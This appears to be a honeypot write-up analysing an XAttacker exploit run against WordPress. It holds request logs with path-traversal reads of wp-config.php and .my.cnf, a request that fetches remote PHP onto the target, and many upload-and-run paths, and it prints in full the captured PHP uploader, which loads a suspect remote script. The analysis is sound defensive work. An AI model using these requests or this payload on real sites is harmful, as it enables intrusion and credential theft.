An example of an XAttacker exploit run.
The downloads include a simple PHP file uploader, which may just be camoflage for malicious JavaScript
All of the HTTP accesses came from 40.112.248.112, in the 4 seconds between 2019-01-22T05:48:36.773-0700 and 2019-01-22T05:48:40.994-0700. I see a lot of rubbish from 40.112.248.112, and it's in a Microsoft IP address range, which is infuriating.
p0f3 identifies all TCP connections from 40.112.248.112 on 2019/01/22 as "Linux 3.11 and newer",
which coincidentally agrees with the User Agent string:
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31
This is the User Agent string that the XAttacker tool uses.
| Timestamp | URL |
|---|---|
| 2019-01-22T05:48:36.773-0700 | /%0D/wp-login.php |
| 2019-01-22T05:48:37.134-0700 | /%0D/blog/wp-login.php |
| 2019-01-22T05:48:37.437-0700 | /%0D/wordpress/ |
| 2019-01-22T05:48:38.522-0700 | /%0D/wp-admin/admin-ajax.php?action=getcountryuser&cs=2 |
| 2019-01-22T05:48:38.604-0700 | /%0D/wp-content/uploads/2019/01%20/XAttacker.php?X=Attacker |
| 2019-01-22T05:48:38.789-0700 | /%0D/wp-content/uploads/2018/01/izom.php |
| 2019-01-22T05:48:38.874-0700 | /%0D/wp-admin/admin-ajax.php |
| 2019-01-22T05:48:39.117-0700 | /%0D/wp-admin/admin-ajax.php |
| 2019-01-22T05:48:39.532-0700 | /%0D/wp-content/uploads/wpmp-previews//XAttacker.php?X=Attacker |
| 2019-01-22T05:48:39.640-0700 | /%0D/wp-content/plugins/uploader/uploadify/uploadify.php |
| 2019-01-22T05:48:39.742-0700 | /%0D/wp-content/uploads/XAttacker.php?X=Attacker |
| 2019-01-22T05:48:39.842-0700 | /%0D/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php |
| 2019-01-22T05:48:39.938-0700 | /%0D/wp-content/plugins/wp-property/third-party/uploadify/XAttacker.php?X=Attacker |
| 2019-01-22T05:48:40.029-0700 | /%0D/wp-content/plugins/social-networking-e-commerce-1/classes/views/social-options/form_cat_add.php |
| 2019-01-22T05:48:40.148-0700 | /%0D/wp-content/plugins/social-networking-e-commerce-1/images/uploads/XAttacker.php?X=Attacker |
| 2019-01-22T05:48:40.286-0700 | /%0D/wp-admin/admin-ajax.php |
| 2019-01-22T05:48:40.391-0700 | /%0D/wp-content/uploads/user_uploads/upload.php?X=Attacker |
| 2019-01-22T05:48:40.486-0700 | /%0D/wp-content/plugins/magic-fields/RCCWP_upload_ajax.php |
| 2019-01-22T05:48:40.868-0700 | /%0D/wp-content/plugins/ecstatic/XAttacker.php?X=Attacker |
| 2019-01-22T05:48:40.994-0700 | /%0D/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-deep-gray/designit/cs/upload.php |
| 2019-01-22T05:48:41.357-0700 | /%0D/wp-content/uploads/assignments/ms-sitemple.php |
It appears that the attackers thought the WordPress blog they wanted to exploit was in a directory named with a single character value 0x0d, ASCII carriage return.
I cloned and tried out the original XAttacker software. These are the URLs it accessed during a single run.
| URL |
|---|
| /wordpress//smiley/1.gif |
| /wordpress//rss.xml |
| /wordpress/ |
| /wordpress//wp-admin/admin-ajax.php?action=getcountryuser&cs=2 |
| /wordpress//wp-content/uploads/2019/02/XAttacker.php?X=Attacker |
| /wordpress//wp-admin/admin.php?page=blaze_manage |
| /wordpress//wp-admin/admin.php?page=catpro_manage |
| /wordpress//wp-content/plugins/cherry-plugin/admin/import-export/upload.php |
| /wordpress//wp-content/plugins/cherry-plugin/admin/import-export/XAttacker.php?X=Attacker |
| /wordpress/ |
| /wordpress//wp-content/plugins/downloads-manager/upload/XAttacker.php?X=Attacker |
| /wordpress//wp-content/plugins/formcraft/file-upload/server/php/ |
| /wordpress//wp-admin/admin.php?page=levoslideshow_manage |
| /wordpress//wp-admin/admin.php?page=powerzoomer_manage |
| /wordpress//?gf_page=upload |
| /wordpress//wp-content/uploads/_input_3_css.php.jd |
| /wordpress//wp-includes/wp-footer.php |
| /wordpress//?gf_page=upload |
| /wordpress//_input_3_Psyco.html |
| /wordpress//wp-admin/admin-ajax.php |
| /wordpress//wp-content/plugins/revslider/temp/update_extract/revslider/XAttacker.php |
| /wordpress//wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php |
| /wordpress//wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php |
| /wordpress//wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php |
| /wordpress//wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/revslider/XAttacker.php |
| /wordpress//wp-content/themes/medicate/script/revslider/temp/update_extract/revslider/XAttacker.php |
| /wordpress//wp-content/themes/centum/revslider/temp/update_extract/revslider/XAttacker.php |
| /wordpress//wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/revslider/XAttacker.php |
| /wordpress//wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php |
| /wordpress//wp-content/themes/pindol/revslider/temp/update_extract/revslider/XAttacker.php |
| /wordpress//wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php |
| /wordpress//wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php |
| /wordpress//wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php |
| /wordpress//wp-admin/admin-ajax.php |
| /wordpress//wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css |
| /wordpress//wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php |
| /wordpress//wp-admin/admin-ajax.php?action=revslider_show_image&img=../../.my.cnf |
| /wordpress//wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php/wp-admin/admin-ajax.php |
| /wordpress//wp-content/plugins/showbiz/temp/update_extract/XAttacker.php?X=Attacker |
| /wordpress//wp-content/plugins/simple-ads-manager/sam-ajax-admin.php |
| /wordpress//wp-admin/admin.php?page=slideshowpro_manage |
| /wordpress//wp-content/plugins/wp-mobile-detector/resize.php?src=https://raw.githubusercontent.com/Moham3dRiahi/XAttacker/master/XAttacker.php |
| /wordpress//wp-content/plugins/wp-mobile-detector/cache/XAttacker.php?X=Attacker |
| /wordpress//wp-admin/admin-post.php?page=wysija_campaigns&action=themes |
| /wordpress//wp-content/uploads/wysija/themes/XAttacker/XAttacker.php?X=Attacker |
| /wordpress//wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php |
| /wordpress//wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/XAttacker.php?X=Attacker |
| /wordpress//wp-content/plugins/dzs-zoomsounds/admin/upload.php |
| /wordpress//wp-content/plugins/dzs-zoomsounds/admin/upload/XAttacker.php?X=Attacker |
| /wordpress//wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2019&Month=02 |
| /wordpress//wp-content/uploads/2019/02/XAttacker.php?X=Attacker |
| /wordpress//com_sexycontactform/fileupload/index.php |
| /wordpress//com_sexycontactform/fileupload/files/XAttacker.php?X=Attacker |
| /wordpress//wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/ |
| /wordpress//wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/XAttacker.php?X=Attacker |
| /wordpress//jm-ajax/upload_file/ |
| /wordpress//wp-content/uploads/job-manager-uploads/file/2019/02/XAttacker.gif |
| /wordpress//wp-content/plugins/php-event-calendar/server/file-uploader/ |
| /wordpress//wp-content/themes/synoptic/lib/avatarupload/upload.php |
| /wordpress//wp-content/uploads/markets/avatars/XAttacker.php?X=Attacker |
| /wordpress//wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload |
| /wordpress//wp-content/uploads/XAttacker.php?X=Attacker |
| /wordpress//wp-content/themes/cubed_v1.2/functions/upload-handler.php |
| /wordpress//wp-content/uploads/2019/02/XAttacker.php?X=Attacker |
| /wordpress//wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php |
| /wordpress//wp-content/uploads/settingsimages/XAttacker.php?X=Attacker |
| /wordpress//wp-content/themes/konzept/includes/uploadify/upload.php |
| /wordpress//wp-content/themes/konzept/includes/uploadify/uploads/XAttacker.php?X=Attacker |
| /wordpress//wp-content/plugins/omni-secure-files/plupload/examples/upload.php |
| /wordpress//wp-content/plugins/omni-secure-files/plupload/examples/uploads/XAttacker.php?X=Attacker |
| /wordpress//wp-content/plugins/pitchprint/uploader/ |
| /wordpress//wp-content/plugins/pitchprint/uploader/files/XAttacker.php?X=Attacker |
| /wordpress//wp-content/themes/satoshi/upload-file.php |
| /wordpress//wp-content/satoshi/images/XAttacker.php?X=Attacker |
| /wordpress//wp-content/themes/pinboard/themify/themify-ajax.php?upload=1 |
| /wordpress//wp-content/themes/pinboard/uploads/XAttacker.php?X=Attacker |
| /wordpress//wp-content/plugins/barclaycart/uploadify/uploadify.php |
| /wordpress//wp-content/plugins/barclaycart/uploadify/XAttacker.php?X=Attacker |
| /wordpress/index.php/wp-json/wp/v2/posts/ |
The only things the malicious, in-the-wild XAttacker and the original, vanilla XAttacker have in common
are checking for successful execution of XAttacker.php,
the small PHP program sent along by the exploits XAttacker uses.
This does show that someone has developed XAttacker further, keeping it up-to-date with fresh, new exploits.
Both in-the-wild and github repo XAttacker send a small PHP file as the payload of their exploits.
It's clear that the downloaded file my honey pot caught is derived from XAttacker.php from the XAttacker software.
The downloaded file is slightly different than XAttacker.php from the github repo.
It seems... worse.
I have so many questions. It will make more sense if I just include the code, it's short.
<html>
<!-- X Attacker v1.5 -->
</html>
<?php
echo '
<script type="text/javascript" src="http://www.codejquery.net/jquery.mins.js" ></script>
<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }
else { echo '<b>Not uploaded ! </b><br><br>'; }
}
?>
- Why does it have a
<html>...</html>block before the PHP interpreter gets invoked? This is true even for the officialXAttacker.phpfile. - Why does the PHP output an HTML form after the
</html>tag? This, too, is true even for the officialXAttacker.phpfile. - Why does the code load what looks like jQuery JavaScript?
This is not in the official
XAttacker.phpfile. - Why does the PHP echo text that is static, not dependent on PHP execution? Shouldn't that be in the
<html>block? - Why does the
<input type="file">tag have an attributesize="50"? Thetype="file"attribute causes a "Browse" button to appear, file name length doesn't seem to get consideration. - Why does it respond with
Shell Uploaded ! :)when a file upload succeeds? It seems like a general-purpose uploader, not specifically a web shell dropper.
It seems to work, despite all the gross HTML mistakes, and poor PHP style.
It's also a little different than the original XAttacker.php,
further reinforcing the conclusion that development of XAttacker is ongoing, but outside the github repo.
I missed it the first time through, but the "jQuery" src of "http://www.codejquery.net/jquery.mins.js"
probably led to some malicious JavaScript, not real jQuery.
Currently, jQuery comes from https://code.jquery.com/jquery-3.3.1.min.js
www.code.jquery.net does not have an IP address in DNS.
That may not be good news.
whois says:
Domain Name: codejquery.net
Registry Domain ID: 2083148135_DOMAIN_NET-VRSN
Registrar WHOIS Server: WHOIS.ENOM.COM
Registrar URL: WWW.ENOM.COM
Updated Date: 2019-01-31T03:19:57.00Z
Creation Date: 2016-12-19T18:10:00.00Z
Registrar Registration Expiration Date: 2018-12-19T18:10:13.00Z
Registrar: ENOM, INC.
Registrar IANA ID: 48
Domain Status: pendingdelete* https://www.icann.org/epp#pendingdelete*
Domain Status: pendingdelete https://www.icann.org/epp#pendingdelete
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: REDACTED FOR PRIVACY
Wow, created on 2016-12-19, and left untouched until the registration expired on 2018-12-19. Didn't anybody complain? Did ENOM, INC ignore all the complaints?
In any case, I can't get the JavaScript this uploader used to fetch.
I found an XAttacker mention that dates to November 14, 2017. The initial commit in the github repo is on Nov 7, 2017, but commits as late as Oct 29, 2018. Either Moham3dRiahi put XAttacker into github just as people found it in the wild, or he got really unlucky, and someone spotted his first few uses.